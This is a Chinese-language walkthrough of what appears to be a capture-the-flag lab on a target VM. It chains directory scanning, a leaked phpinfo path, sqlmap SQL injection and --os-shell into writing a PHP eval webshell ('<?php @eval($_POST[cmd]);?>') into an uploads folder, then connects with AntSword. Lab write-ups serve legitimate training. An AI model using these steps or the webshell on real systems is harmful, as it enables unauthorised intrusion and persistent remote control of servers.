1.使用扫描工具 搜索靶机地址
得出靶机地址为172.16.1.88
2.使用目录扫描工具dirb(kali自带)对靶机进行扫描
发现有一个robots.txt文件
访问http://172.16.1.88/robots.txt 发现有两个目录
3.分别访问这两个目录
http://172.16.1.88/m3diNf0/ 访问第一个目录时无法访问
http://172.16.1.88/se3reTdir777/uploads/ 访问第二个目录也无法访问
4.使用dirb对/m3diNf0/目录进行扫描
发现一个info.php文件 我们在网站上打开
在这里我们找到了网站的绝对路径
5.继续使用dirb对/se3reTdir777目录进行扫描
发现一个index.php文件
在网站上打开发现是一个搜索页面 可能存在搜索型注入
6.使用burp抓包,在注入点后加* 然后保存为1.txt
7.使用sqlmap(kali自带)工具进行注入
使用sqlmap -r 1.txt进行注入
8.尝试--os-shell 但是需要绝对路径
因为我们之前已经找到绝对路径 可以直接尝试连接--os-shell
9.写入一句话代码
echo '<?php @eval($_POST[cmd]);?>' >> /home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads/1.php
10.使用中国蚁剑连接
11.测试连接成功
成功获取webshell权限